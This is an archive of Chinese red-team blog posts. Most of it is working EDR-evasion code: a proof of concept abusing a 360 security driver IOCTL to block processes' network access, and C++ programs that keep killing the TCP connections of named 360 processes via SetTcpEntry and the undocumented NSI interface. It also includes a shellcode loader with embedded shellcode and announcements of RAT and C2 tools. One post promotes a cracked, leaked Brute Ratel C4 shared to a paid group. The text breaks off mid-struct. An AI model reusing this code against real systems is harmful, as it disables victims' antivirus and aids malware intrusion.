41group

利用360驱动阻断EDR网络连接

Wed, 11 Feb 2026 01:20:00 +0800

可以遐想 2026-02-11 01:20 安徽

以下文章来源于：遐想的小窝

遐想的小窝

曾专注红队对抗和武器化开发，现懒癌晚期，随缘研究。

闲来无事发个水文，记录一下特殊情况下分析360安全卫士过程中觉得可以公开的一个点。

在对 `360netmon_x64_wfp.sys` 进行逆向工程时，我首先定位到驱动的入口点 `DriverEntry`，发现驱动创建了两个设备对象：

IoCreateDevice(DriverObject, 0, L"\\Device\\360TdiFilter", 0x22u, 0, 0, &deviceObject);
IoCreateSymbolicLink(L"\\DosDevices\\360TdiFilter", L"\\Device\\360TdiFilter");


IoCreateDevice(DriverObject, 0, L"\\Device\\360TdiSpeed", 0x22u, 0, 0, &qword_25320);
IoCreateSymbolicLink(L"\\DosDevices\\360TdiSpeed", L"\\Device\\360TdiSpeed");

这两个设备可以从用户态通过符号链接 `\\\\.\\\\360TdiFilter` 和 `\\\\.\\\\360TdiSpeed` 访问。

这个驱动注册了多个 IRP 处理函数，其中 `IrpMjDeviceControl` 处理函数（地址 `0x12374`）负责处理所有 IOCTL 请求。

在 IrpMjDeviceControl 的入口处，代码仅验证设备对象是否匹配，完全没有调用者身份验证：

123D8: mov rcx, cs:g_pDeviceObject_TdiFilter
123DF: cmp rdi, rcx ; 仅验证设备对象
123E2: jz short loc_12422

既然如此我们就不得不去分析 IOCTL 接口实现进一步的利用。因为我们通过驱动的信息已经知道这个WFP驱动的用途，所以我们的预期就是任意的阻断网络功能。

很快我们的目光就到了 IOCTL 0x220804:身上，我们猜测功能是设置进程网络限速/阻断。于是细细地看了一下。

跟进sub_18BB8方法，我们发现它会：

解析用户提供的进程路径
在进程hash表中查找或创建进程节点
设置进程的限速配置字段
如果 qwBlockCnnt 设置为 LLONG_MAX，则完全阻断网络

IOCTL 0x220444 则主要负责WFP 过滤器操作，用来动态添加/删除 WFP 过滤规则，我们直接摸进sub_1D45C。

NTSTATUS __fastcall sub_1D45C(int a1)
{
 NTSTATUS v7;
 char v1, v2, v3, v4;


 // 检查 Windows 版本（仅支持 Win10 1607+）
 if (g_WindowsBuildNumber < 0x23F0) // Build 9200
 return STATUS_NOT_IMPLEMENTED;


 // 检查是否已经是相同模式
 if (dword_6B78C == a1)
 return STATUS_SUCCESS;


 // 检查 WFP 引擎句柄
 if (!engineHandle)
 return STATUS_DEVICE_NOT_READY;


 // 开始 WFP 事务
 v7 = FwpmTransactionBegin0(engineHandle, 0);
 if (v7 < 0)
 return v7;


 if (a1) { // 启用过滤
 // 注册 4 个 WFP Callout (Established V4/V6, Datagram V4/V6)
 v7 = sub_1D1E8(qword_6B790, &xmmword_236D0, &calloutId);
 if (v7 < 0 && v7 != STATUS_FWP_ALREADY_EXISTS)
 goto CLEANUP;
 v1 = 1;


 v7 = sub_1D1E8(qword_6B790, &xmmword_236E0, &dword_6B10C);
 if (v7 < 0 && v7 != STATUS_FWP_ALREADY_EXISTS)
 goto CLEANUP;
 v2 = 1;


 v7 = sub_1D1E8(qword_6B790, &xmmword_236F0, &dword_6B750);
 if (v7 < 0 && v7 != STATUS_FWP_ALREADY_EXISTS)
 goto CLEANUP;
 v3 = 1;


 v7 = sub_1D1E8(qword_6B790, &xmmword_23700, &dword_6B754);
 if (v7 < 0 && v7 != STATUS_FWP_ALREADY_EXISTS)
 goto CLEANUP;
 v4 = 1;


 // 添加 4 个 WFP Filter
 v7 = sub_1CF28(..., engineHandle, 0, &dword_6B7A0);
 // ... (重复为其他3个过滤器)


 } else { // 禁用过滤
 // 删除所有过滤器和 Callout
 v7 = FwpmFilterDeleteById0(engineHandle, id);
 v7 = FwpmFilterDeleteById0(engineHandle, qword_6B7C0);
 v7 = FwpmCalloutDeleteById0(engineHandle, dword_6B7A0);
 // ...


 sub_1E288(); // 清理内部状态
 FwpsCalloutUnregisterById0(calloutId);
 FwpsCalloutUnregisterById0(dword_6B10C);
 FwpsCalloutUnregisterById0(dword_6B750);
 FwpsCalloutUnregisterById0(dword_6B754);
 }


 // 提交 WFP 事务
 v7 = FwpmTransactionCommit0(engineHandle);
 if (v7 >= 0)
 dword_6B78C = a1; // 保存当前模式


CLEANUP:
 if (v7 < 0) {
 // 失败时回滚并清理已注册的 Callout
 if (v1) FwpsCalloutUnregisterById0(calloutId);
 if (v2) FwpsCalloutUnregisterById0(dword_6B10C);
 if (v3) FwpsCalloutUnregisterById0(dword_6B750);
 if (v4) FwpsCalloutUnregisterById0(dword_6B754);
 FwpmTransactionAbort0(engineHandle);
 }


 return v7;
}

也就是说：

这玩意儿在 WFP 层级动态注册/注销 Callout 和 Filter
Callout 在 FWPM_LAYER_ALE_FLOW_ESTABLISHED_V4/V6和
FWPM_LAYER_ALE_AUTH_CONNECT_V4/V6 层拦截
没有验证调用者权限，任何管理员进程都可以调用

驱动通过以下流程实现网络阻断：



用户态应用 (Pwn.exe)
 ↓ DeviceIoControl(0x220804, &LIMIT_SPEED)
┌───▼─────────────────────────────┐
│ IrpMjDeviceControl │
│ @ 0x12374 │
└───┬─────────────────────────────┘
 ↓ call sub_18BB8
┌───▼─────────────────────────────┐
│ 解析进程路径并查找哈希表 │
│ LookupProcessInHashTable() │
└───┬─────────────────────────────┘
 ↓ 更新进程节点
┌───▼─────────────────────────────┐
│ ProcessNode->qwBlockCnnt = MAX │
│ ProcessNode->nLimitSend = MAX │
│ ProcessNode->nLimitRecv = MAX │
│ ProcessNode->bCancelFlag = FALSE │
└───┬─────────────────────────────┘
 ↓
 等待目标进程产生网络活动
 ↓
┌───▼─────────────────────────────┐
│ WFP Callout 拦截点 │
│ (网络包发送/接收时触发) │
└───┬─────────────────────────────┘
 ↓ 查询限速配置
┌───▼─────────────────────────────┐
│ if (ProcessNode->qwBlockCnnt │
│ == LLONG_MAX) │
│ return FWP_ACTION_BLOCK; │
└──────────────────────────────────┘
 ↓
 网络包被丢弃，进程无法联网

现在开始搓POC

通过逆向分析和动态调试，我们重建了驱动期望的数据结构：



#pragma pack(push, 4)
typedef struct _PACK {
 WCHAR szNtPath[MAX_PATH + 40]; // +0x000: NT格式路径 (e.g., \WINDOWS\SYSTEM32\NOTEPAD.EXE)
 WCHAR szPath[MAX_PATH]; // +0x228: DOS格式路径 (e.g., C:\Windows\System32\notepad.exe)
 BOOL bCancelFlag; // +0x428: TRUE=解除限制, FALSE=应用限制
 LONGLONG qwBlockCnnt; // +0x430: 阻断计数器 (LLONG_MAX = 完全阻断)
 LONGLONG nLimitSend; // +0x438: 上传速度限制 (字节/秒)
 LONGLONG nLimitRecv; // +0x440: 下载速度限制 (字节/秒)
 DWORD dwZeroCheck; // +0x448: 保留字段 (必须为0)
} PACK, *PPACK;
#pragma pack(pop)

后面的就很简单了，只需要这样那样就可以了:

BOOL BlockProcessNetwork(const WCHAR *szImagePath) {
 HANDLE hDevice;
 PACK ls;
 DWORD dwBytesReturned;


 // 1. 打开驱动设备对象
 hDevice = CreateFileW(
 L"\\\\.\\360TdiFilter",
 GENERIC_READ | GENERIC_WRITE,
 FILE_SHARE_READ | FILE_SHARE_WRITE,
 NULL,
 OPEN_EXISTING,
 0,
 NULL
 );


 if (hDevice == INVALID_HANDLE_VALUE) {
 printf("[!] Failed to open device (Error: %lu)\n", GetLastError());
 return FALSE;
 }


 // 2. 启用驱动监控功能（可选，驱动可能已启用）
 DeviceIoControl(hDevice, 0x220408, NULL, 0, NULL, 0, &dwBytesReturned, NULL);


 // 3. 构造限速/阻断结构体
 ZeroMemory(&ls, sizeof(ls));
 wcsncpy_s(ls.szPath, MAX_PATH, szImagePath, _TRUNCATE);
 ConvertToNtPath(szImagePath, ls.szNtPath); // 转换为NT路径格式


 ls.bCancelFlag = FALSE; // FALSE = 应用限制
 ls.qwBlockCnnt = LLONG_MAX; // 设置为最大值 = 完全阻断
 ls.nLimitSend = LLONG_MAX; // 上传限制 = 无限大
 ls.nLimitRecv = LLONG_MAX; // 下载限制 = 无限大
 ls.dwZeroCheck = 0;


 // 4. 发送 IOCTL 请求
 if (!DeviceIoControl(
 hDevice,
 0x220804, // IOCTL_360TDIFILTER_LIMIT_PROCESS_SPEED
 &ls,
 sizeof(ls),
 NULL,
 0,
 &dwBytesReturned,
 NULL)) {
 printf("[!] DeviceIoControl failed (Error: %lu)\n", GetLastError());
 CloseHandle(hDevice);
 return FALSE;
 }


 printf("[+] Successfully blocked: %S\n", szImagePath);
 CloseHandle(hDevice);
 return TRUE;
}

完整的EXP可以查看我的Github:

https://github.com/kyxiaxiang/360WFP_Exploit

阻断后：

当然了360对自己是加了白名单的，所以银狐们退下吧(/摊手/)

阅读原文

跳转微信打开

MiaoMeow:一个萌芽阶段的Linux远程管理工具

Sun, 21 Dec 2025 18:04:00 +0800

可以遐想 2025-12-21 18:04 日本

以下文章来源于：遐想的小窝

遐想的小窝

曾专注红队对抗和武器化开发，现懒癌晚期，随缘研究。

实在是无聊极了，正好最近用ImGUI搓一些神秘的玩具比较上头，顺手搓了这么个玩意儿~

主界面预览：

经典优雅（bushi）的界面

监听创建：

客户端生成：

优雅（cucao）的进程伪装（bushi），朴素（jianlou）的数据加密。测试执行效果。

Shell功能吧本来是打算做成完美的交互式，结果自然是懒癌胜利（但是是支持ctrl+C的）。测试支持MemFD：

文件管理：

支持修改时间戳和权限：

端口转发和反向代理：

进程和网络链接：

免责声明

本工具仅供学习和授权测试使用。请勿用于任何非法活动。使用者需对自己的行为负责。

项目地址：https://github.com/kyxiaxiang/MiaoMeow

阅读原文

跳转微信打开

重金求才

Tue, 16 Sep 2025 14:32:00 +0800

2025-09-16 14:32 浙江

诚招高级渗透工程师一名，JD如图。

重金求才

跳转微信打开

CobaltStrike Beacon C++ 源码开源分享

Sun, 03 Aug 2025 15:12:00 +0800

可以遐想 2025-08-03 15:12 安徽

一鲸落，万物生

我在 GitHub 上公开了 CobaltStrike Beacon 的 C++ 源代码：

🔗 项目地址：
👉 github.com/kyxiaxiang/CobaltStrikeBeaconCppSource

🧭 为什么开源？

我曾从国内某二手平台购入此源码，过程中深感“源码倒卖”之乱象已久——
同样的代码反复售卖、换皮包装、贴牌割韭菜，或以二开，或以教学。一些人靠此轻松牟利，却阻碍了真正的技术交流。

我选择开源，是想打破这种不对等的信息垄断。

一鲸落，万物生。
源码不该成为少数人的私利，而应成为技术共同体的土壤。

🔍 项目亮点

✅ 开箱即用的 Beacon 核心源码（C++ 实现）
✅ 包含通信框架、加密处理、DLL逻辑等关键部分
✅ 可作为自研 C2 框架、红队 Payload 的技术参考

🔧 使用前准备

要编译运行此项目，你需要：

安装 LibTomMath
安装 LibTomCrypt
自行反编译相关 JAR 文件
替换目标 DLL 文件

📌 注：涉及 Java/Native 混合构建流程，请具备基础逆向能力。

🎯 我的初衷

我开源这份项目，是基于以下几点考虑：

🌱 促进国产安全工具的透明化与标准化
🧠 为网络攻防爱好者、红蓝队员提供真实参考
🔍 推动 AV/EDR 行业提升检测与防护能力
🤝 为真正热爱安全的人打开更多学习入口

📢 特别声明

本项目仅供合法、合规、安全研究与教育用途使用。

⚠️ 请勿用于非法用途，否则后果自负。本人对此不承担任何责任。

阅读原文

跳转微信打开

GateSentinel：为实战而生的现代化 C2 框架（雏形）

Thu, 17 Jul 2025 10:45:00 +0800

可以遐想 2025-07-17 10:45 中国香港

在当前高强度的攻防对抗环境中，C2 框架早已不只是一个“可用”工具，而是“致胜”的核心。无论是红队演练、HV

在当前高强度的攻防对抗环境中，C2 框架早已不只是一个“可用”工具，而是“致胜”的核心。无论是红队演练、HVV 对抗，还是日常安全研究与验证，一个稳定、隐蔽、可定制的 C2 系统，都是关键战力。

以上以下内容都是AI写的，除了这一句：雏形项目，但是可以实战使用，适合冲锋、钓鱼等场景，保护后阶段的Beacon、Agent。

🚀 为什么选择 GateSentinel？

🔥 面向实战的设计理念

支持 HTTP/HTTPS 双协议通信，自由穿透多种边界环境。
通信数据自定义编码与伪装机制，防护规避更进一步。
可配置混淆流量包装，模拟 Web 请求，提升隐蔽性。
配置热重载，无需重启，实战灵活调度。
模块化任务下发机制，支持自定义命令扩展与插件化开发。

🛠️ 轻量高效的技术栈

服务端使用 Go 编写，跨平台部署稳定可靠；
客户端使用 纯 C 实现，体积小、容易免杀；
一键编译 & 打包，轻松部署到冲锋马、测试节点等环境中。

👁️ 面向 HVV/红队使用场景优化

HVV 作战节奏快、目标广、检测敏感——GateSentinel 在稳定性与隐蔽性上双重优化，为你争取每一分成功的可能。

✔️ Web 管理界面轻量、直观、快速响应
✔️ Beacon 端通信包极简设计，便于流量伪装、代理穿透

📦 开源即自由，定制无障碍

我深知，不同作战单位对工具的需求千差万别。GateSentinel 的所有代码已完全开源，支持二次开发、私有部署、深度定制。欢迎各路研究员 fork、扩展、提 PR。

GitHub 地址：
👉 https://github.com/kyxiaxiang/GateSentinel

⚠️ 合规声明

本项目仅供授权测试、教学研究、安全防护模拟使用。严禁用于未授权环境下的网络入侵与数据破坏。开发者不对滥用造成的后果负责。

🧠 与其等待别人打造利器，不如亲自掌握主动权。

加入 GateSentinel，开启你的红队实战新纪元。

📥 立即体验，Fork 即用！

阅读原文

跳转微信打开

brute ratel c4 1.7.4泄露

Fri, 04 Jul 2025 21:25:00 +0800

可以遐想 2025-07-04 21:25 中国香港

起因一位热心股东提供了重要线索奈斯！目标锁定，直接拉回来细品一下，不得不说微步你做的不厚道啊。解压康康一切正

起因一位热心股东提供了重要线索

奈斯！目标锁定，直接拉回来细品一下，不得不说微步你做的不厚道啊。

解压康康一切正常，省略破解的过程。

值得一提新版本的BRC4支持了Windows版本的GUI，虽然我没试过

测试功能一切正常，老样子丢星球（毕竟我破解也要费点脑子）毕竟我没有义务直接公开，坐等别人泄露的我也不怪你，但还是希望可以支持一下。细想一下为什么CS4.11出来了都没有破解CS4.10的消息，东西辗转来之不易，自己想想吧。

简单宣传一下星球，

摆烂红队快乐星球

一个努力打造高质量安全技术为主的交流社区，专注于红蓝对抗最新的前沿技术交流，内有红队和各领域资深的大佬。本星球分享的内容涉及知识包括但不限于c/cpp语言开发、 web/二进制漏洞分析、驱动开发、rootkit、 shellcode、杀软对抗、内网渗透、编译器、逆向调试技术、学术论文、机器学习、数据分析、程序分析、exp/poc分享、0day学习等。

阅读原文

跳转微信打开

浅浅分析银狐最新断网手法

Fri, 06 Jun 2025 00:13:00 +0800

原创可以遐想 2025-06-06 00:13 日本

揭秘数字安全产品断网机制：从 SetTcpEntry 到 NsiSetAllParameters

排版心累移步 https://www.notion.so/209c6252b11b802fa69bdde1c05ac01b?source=copy_link 本来打算起名揭秘数字安全产品断网机制：从 SetTcpEntry 到 NsiSetAllParameters 感觉太装了算了还是低调一点的好。

在当前的安全防护体系中，越来越多的国产安全产品（如数字等）采用“云依赖”模式 —— 核心规则、主动防护、样本查杀全部由云端驱动。根据最新的银狐样本发现小黑们针对数字做了定向断网，一旦失去网络连接，它的“战斗力”将迅速下降。偶然想起来在闲鱼还见到有人卖所谓的 0day断网，想来也是这种方法。今天来浅浅地剖析一下。透过小小的样本来带各位进行深度的思考，如何最大化的规避。

某度搜索的前几位都是银狐，不做评价~

我们直奔主题 GetTcpTable(2) 和 SetTcpEntry

GetTcpTable2函数 https://learn.microsoft.com/en-us/windows/win32/api/iphlpapi/nf-iphlpapi-gettcptable2

GetTcpTable2 用于检索系统当前的 TCP 连接信息（IPv4 和 IPv6），包括连接的本地地址、远程地址、状态等。

原型如下：

IPHLPAPI_DLL_LINKAGE ULONG GetTcpTable2(
  [out] PMIB_TCPTABLE2 TcpTable,
  [in, out] PULONG SizePointer,
  [in]   BOOL Order
);

参数说明：

·TcpTable: 指向 MIB_TCPTABLE2 结构体的指针，保存返回的 TCP 表。

·SizePointer: 输入/输出参数，表示缓冲区大小（以字节为单位）。如果缓冲区不够，函数会返回 ERROR_INSUFFICIENT_BUFFER 并通过该参数返回所需大小。

·Order: 是否按照连接的本地地址升序排列。

SetTcpEntry函数 https://learn.microsoft.com/en-us/windows/win32/api/iphlpapi/nf-iphlpapi-settcpentry

SetTcpEntry 用于修改一个现有的 TCP 连接的状态，比如强制关闭连接（改为 DELETE_TCB 状态）。

原型如下：

IPHLPAPI_DLL_LINKAGE DWORD SetTcpEntry(
[in] PMIB_TCPROW pTcpRow
);

参数说明：

·pTcpRow: 指向 MIB_TCPROW 的指针，用于指定要更改的 TCP 条目。.

通过这两个Api的描述我们就不难猜出银狐是通过获取所有的TCP连接列表，然后筛选特定进程的连接强行关闭，这样就可以精确地断开某个特定程序所建立的所有网络连接，而不影响其他程序。

实现如下逻辑：

获取某进程的所有 TCP 连接 → 找出其 PID → 遍历连接 → 强制关闭连接。

我们可以简单实现一个Demo验证一下猜想：

#include
#include
#include
#include
#include
#include

#pragma comment(lib, "iphlpapi.lib")
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "Psapi.lib")

std::vector<DWORD> GetPidsByProcessName(const std::wstring& processName){
  std::vector<DWORD> pids;
  HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  if(snapshot == INVALID_HANDLE_VALUE){
  return pids;
  }
  PROCESSENTRY32W pe;
  pe.dwSize =sizeof(pe);
  if(!Process32FirstW(snapshot, &pe)){
  CloseHandle(snapshot);
  return pids;
  }
  do{
  if(processName == pe.szExeFile){
  pids.push_back(pe.th32ProcessID);
  }
  }while(Process32NextW(snapshot, &pe));
  CloseHandle(snapshot);
  return pids;
}

void CloseTcpConnectionsByPid(DWORD pid){
  DWORD size =0;
  PMIB_TCPTABLE2 tcpTable =nullptr;

  if(GetTcpTable2(nullptr, &size, TRUE)!= ERROR_INSUFFICIENT_BUFFER){
  return;
  }

  tcpTable =(PMIB_TCPTABLE2)malloc(size);
  if(!tcpTable)return;

  if(GetTcpTable2(tcpTable, &size, TRUE)!= NO_ERROR){
  free(tcpTable);
  return;
  }

  for(DWORD i =0; i < tcpTable->dwNumEntries;++i){
  MIB_TCPROW2& row = tcpTable->table[i];
  if(row.dwOwningPid == pid && row.dwState == MIB_TCP_STATE_ESTAB){
  MIB_TCPROW2 rowToSet = row;
  rowToSet.dwState = MIB_TCP_STATE_DELETE_TCB;
  SetTcpEntry((PMIB_TCPROW)&rowToSet);
  }
  }
  free(tcpTable);
}

int wmain(int argc, wchar_t* argv[]){
  std::vector<std::wstring> targetProcs ={L"360Tray.exe", L"360Safe.exe"};

  while(true){
  for(constauto& procName : targetProcs){
  std::vector<DWORD> pids = GetPidsByProcessName(procName);
  for(DWORD pid : pids){
  CloseTcpConnectionsByPid(pid);
  }
  }
  Sleep(500);
  }

  return0;
}

我们测试一下效果，（需要等一会儿）

我们测试一下是否防御能力变弱：

测试程序代码

#include
#include

unsignedchar buf[]=
"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d"
"\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01"
"\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01"
"\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31"
"\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45"
"\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b"
"\x04\x8b\x4c\x01\xc8\xc3\xc3\x41\xb8\x98\xfe\x8a\x0e\xe8\x92\xff\xff\xff\x48\x31"
"\xc9\x51\x48\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x8d\x0c\x24\x48\x31\xd2"
"\x48\xff\xc2\x48\x83\xec\x28\xff\xd0";

int main(){
  void* exec = VirtualAlloc(nullptr, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  if(!exec){
  std::cerr <<"[-] VirtualAlloc failed\n";
  return-1;
  }

  memcpy(exec, buf, sizeof(buf));
  std::cout <<"[+] Shellcode copied to memory, creating thread...\n";

  HANDLE thread = CreateThread(nullptr, 0, (LPTHREAD_START_ROUTINE)exec, nullptr, 0, nullptr);
  if(!thread){
  std::cerr <<"[-] CreateThread failed\n";
  VirtualFree(exec, 0, MEM_RELEASE);
  return-1;
  }

  WaitForSingleObject(thread, INFINITE);
  std::cout <<"[+] Done\n";

  VirtualFree(exec, 0, MEM_RELEASE);

getchar();// Wait for user input before exiting
  return0;
}

我们恢复网络试一下

测试一个断网条件下的。。。。

那么我们思考一下如果 SetTcpEntry 被安全产品 Hook 掉（比如通过 API 拦截、Inline Hook），那这条路就走不通了，怎么办？我们不妨去看一眼底层的实现重点是看SetTcpEntry

通过反汇编 iphlpapi.dll 中的 SetTcpEntry，可以发现它的底层并不是直接修改 TCP 表，而是依赖了NsiSetAllParameters 这是一个非公开（Undocumented）的 Windows 内部函数，属于 NSI（Network Store Interface）服务的 API 范畴，主要用于设置网络堆栈中的参数。

推断的函数原型如下：

typedef NTSTATUS (NTAPI* NsiSetAllParameters_t)(
  HANDLE NsiHandle,
  DWORD ObjectIndex,
  DWORD ObjectType,
  PVOID InputBuffer,
  DWORD InputBufferLength,
  PVOID OutputBuffer,
  DWORD OutputBufferLength
);

也就是说我们可以手动实现一个 SetTcpEntry 避免使用 SetTcpEntry

我们需要关注一下他的这些参数，比如 NPI_MS_TCP_MODULEID

这是一个 GUID结构，用来标识TCP 协议模块告诉 NsiSetAllParameters 要对哪一类协议数据执行操作。（猜的）

还原就是

BYTE NPI_MS_TCP_MODULEID[]={0x18, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03, 0x4A, 0x00, 0xEB, 0x1A, 0x9B, 0xD4, 0x11, 0x91, 0x23, 0x00, 0x50, 0x04, 0x77, 0x59, 0xBC};

正当我准备苦逼的手搓时发现已经有前辈走在前面，再仔细一看，Emmmm以前看过只是失去了记忆。

实现如下：

#include
#include
#include
#include
#include
#include

#pragma comment(lib, "iphlpapi.lib")
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "Psapi.lib")

// Undocumented TCP module ID for NSI (24 bytes)
BYTE NPI_MS_TCP_MODULEID[]={
  0x18, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x03, 0x4A, 0x00, 0xEB, 0x1A, 0x9B, 0xD4, 0x11,
  0x91, 0x23, 0x00, 0x50, 0x04, 0x77, 0x59, 0xBC
};

// Structure expected by NsiSetAllParameters to represent a TCP socket
struct TcpKillParamsIPv4 {
  WORD  localAddrFamily;
  WORD  localPort;
  DWORD localAddr;
  BYTE  reserved1[20];

  WORD  remoteAddrFamily;
  WORD  remotePort;
  DWORD remoteAddr;
  BYTE  reserved2[20];
};

// Custom replacement for SetTcpEntry using undocumented NSI API
DWORD MySetTcpEntry(MIB_TCPROW_OWNER_PID* pTcpRow){
  typedef DWORD(WINAPI* NsiSetAllParameters_t)(
  DWORD, DWORD, LPVOID, DWORD, LPVOID, DWORD, LPVOID, DWORD
  );

  // Load NSI module and resolve function
  HMODULE hNsi = LoadLibraryA("nsi.dll");
  if(!hNsi)
  return1;

  NsiSetAllParameters_t pNsiSetAllParameters =
  (NsiSetAllParameters_t)GetProcAddress(hNsi, "NsiSetAllParameters");
  if(!pNsiSetAllParameters)
  return1;

  // Prepare input data for socket termination
  TcpKillParamsIPv4 params ={0};
  params.localAddrFamily = AF_INET;
  params.localPort =(WORD)pTcpRow->dwLocalPort;
  params.localAddr = pTcpRow->dwLocalAddr;
  params.remoteAddrFamily = AF_INET;
  params.remotePort =(WORD)pTcpRow->dwRemotePort;
  params.remoteAddr = pTcpRow->dwRemoteAddr;

  // Issue command to kill the TCP connection
  DWORD result = pNsiSetAllParameters(
  1,   // Unknown / static
  2,   // Action code
  (LPVOID)NPI_MS_TCP_MODULEID, // TCP module identifier
  16, // IO code (guessed)
  &params, sizeof(params), // Input buffer
  nullptr, 0 // Output buffer (unused)
  );

  return result;
}

std::vector<DWORD> GetPidsByProcessName(const std::wstring& processName){
  std::vector<DWORD> pids;
  HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  if(snapshot == INVALID_HANDLE_VALUE){
  wprintf(L"[!] CreateToolhelp32Snapshot failed.\n");
  return pids;
  }

  PROCESSENTRY32W pe;
  pe.dwSize =sizeof(pe);
  if(!Process32FirstW(snapshot, &pe)){
  CloseHandle(snapshot);
  wprintf(L"[!] Process32FirstW failed.\n");
  return pids;
  }

  do{
  if(processName == pe.szExeFile){
  pids.push_back(pe.th32ProcessID);
  wprintf(L"[+] Found process: %s (PID: %lu)\n", pe.szExeFile, pe.th32ProcessID);
  }
  }while(Process32NextW(snapshot, &pe));

  CloseHandle(snapshot);
  return pids;
}

void CloseTcpConnectionsByPid(DWORD pid){
  DWORD size =0;
  PMIB_TCPTABLE2 tcpTable =nullptr;

  if(GetTcpTable2(nullptr, &size, TRUE)!= ERROR_INSUFFICIENT_BUFFER){
  wprintf(L"[!] Failed to query TCP table size.\n");
  return;
  }

  tcpTable =(PMIB_TCPTABLE2)malloc(size);
  if(!tcpTable){
  wprintf(L"[!] Memory allocation failed.\n");
  return;
  }

  if(GetTcpTable2(tcpTable, &size, TRUE)!= NO_ERROR){
  free(tcpTable);
  wprintf(L"[!] Failed to get TCP table.\n");
  return;
  }

  int closedCount =0;
  for(DWORD i =0; i < tcpTable->dwNumEntries;++i){
  MIB_TCPROW2& row = tcpTable->table[i];
  if(row.dwOwningPid == pid && row.dwState == MIB_TCP_STATE_ESTAB){
  MIB_TCPROW2 rowToSet = row;
  rowToSet.dwState = MIB_TCP_STATE_DELETE_TCB;

  DWORD result = MySetTcpEntry((MIB_TCPROW_OWNER_PID*)&row);
  if(result == NO_ERROR){
  closedCount++;
  IN_ADDR localAddr ={ row.dwLocalAddr };
  IN_ADDR remoteAddr ={ row.dwRemoteAddr };
  wprintf(L"   [-] Closed TCP connection: %S:%d -> %S:%d\n",
  inet_ntoa(localAddr), ntohs((u_short)row.dwLocalPort),
  inet_ntoa(remoteAddr), ntohs((u_short)row.dwRemotePort));
  }
  else{
  wprintf(L"   [!] Failed to close connection. Error code: %lu\n", result);
  }
  }
  }

  if(closedCount >0){
  wprintf(L"[=] Closed %d connections for PID %lu\n", closedCount, pid);
  }

  free(tcpTable);
}

int wmain(int argc, wchar_t* argv[]){
  std::vector<std::wstring> targetProcs ={L"360Tray.exe", L"360Safe.exe", L"LiveUpdate360.exe", L"safesvr.exe", L"360leakfixer.exe"};

  wprintf(L"[*] Starting connection monitor...\n");

  while(true){
  for(constauto& procName : targetProcs){
  std::vector<DWORD> pids = GetPidsByProcessName(procName);
  for(DWORD pid : pids){
  CloseTcpConnectionsByPid(pid);
  }
  }
  }

  return0;
}

这样我们进阶实现了略底层的小玩具，试一下效果

依旧可以保持阻断网络。

前面我们调用的是 nsi.dll 中导出的 NsiSetAllParameters。但其实这个函数的本质就是：

构造一个结构体 → 调用 NtDeviceIoControlFile → 与 \.\Nsi 驱动通信 → 让内核修改 TCP 状态

我们现在要做的就是：
跳过 nsi.dll，完全不依赖其封装，自己来实现这套流程。

这里应该字面意思也可以看明白，我们最终其实是和驱动通讯来完成的TCP连接关闭。

NsiSetAllParameters 实际上传的是一个 0x48 字节的结构体，组成如下（我瞎写的）：

struct NSI_SET_PARAMETERS_EX {
  PVOID reserved0; // 0x00
  PVOID reserved1; // 0x08
  PVOID pModuleId; // 0x10 - 指向 TCP 模块 ID（GUID结构或BYTE数组）
  DWORD dwIoCode;   // 0x18 - 固定 16
  DWORD dwUnused1; // 0x1C
  DWORD a1;   // 0x20
  DWORD a2;   // 0x24
  PVOID pInputBuffer;// 0x28
  DWORD cbInputBuffer;// 0x30
  DWORD dwUnused2; // 0x34
  PVOID pMetricBuffer;// 0x38
  DWORD cbMetricBuffer;// 0x40
  DWORD dwUnused3; // 0x44
};

我们计划的流程是：

构造 NSI_SET_PARAMETERS_EX →
  调用 NtDeviceIoControlFile →
  操作 \Device\Nsi →
  执行协议堆栈层断网

隐约间我们可以明白：

·Windows 网络栈的底层通信机制是开放的（设备接口、协议模块）

·只要掌握结构和调用方式，就能控制网络连接的生死

很好这里省略我的悲伤过程，直接上结果：

#include
#include
#include
#include
#include
#include

#pragma comment(lib, "iphlpapi.lib")
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "Psapi.lib")

// ---------------------------------------------
// Dynamic NT Native Function Pointers
// ---------------------------------------------

typedef NTSTATUS(WINAPI* NtDeviceIoControlFile_t)(
  HANDLE, HANDLE, PVOID, PVOID,
  PVOID, ULONG, PVOID, ULONG, PVOID, ULONG);

typedef NTSTATUS(WINAPI* NtWaitForSingleObject_t)(
  HANDLE, BOOLEAN, PLARGE_INTEGER);

typedef ULONG(WINAPI* RtlNtStatusToDosError_t)(NTSTATUS);

// Global function pointers
NtDeviceIoControlFile_t pNtDeviceIoControlFile =nullptr;
NtWaitForSingleObject_t pNtWaitForSingleObject =nullptr;
RtlNtStatusToDosError_t pRtlNtStatusToDosError =nullptr;

//IO_STATUS_BLOCK
typedefstruct _IO_STATUS_BLOCK {
  union{
  NTSTATUS Status;
  PVOID Pointer;
  };
  ULONG_PTR Information;
} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;

typedefstruct _NSI_SET_PARAMETERS_EX {
  PVOID Reserved0;   // 0x00
  PVOID Reserved1;   // 0x08
  PVOID ModuleId; // 0x10
  DWORD IoCode; // 0x18
  DWORD Unused1;   // 0x1C
  DWORD Param1; // 0x20
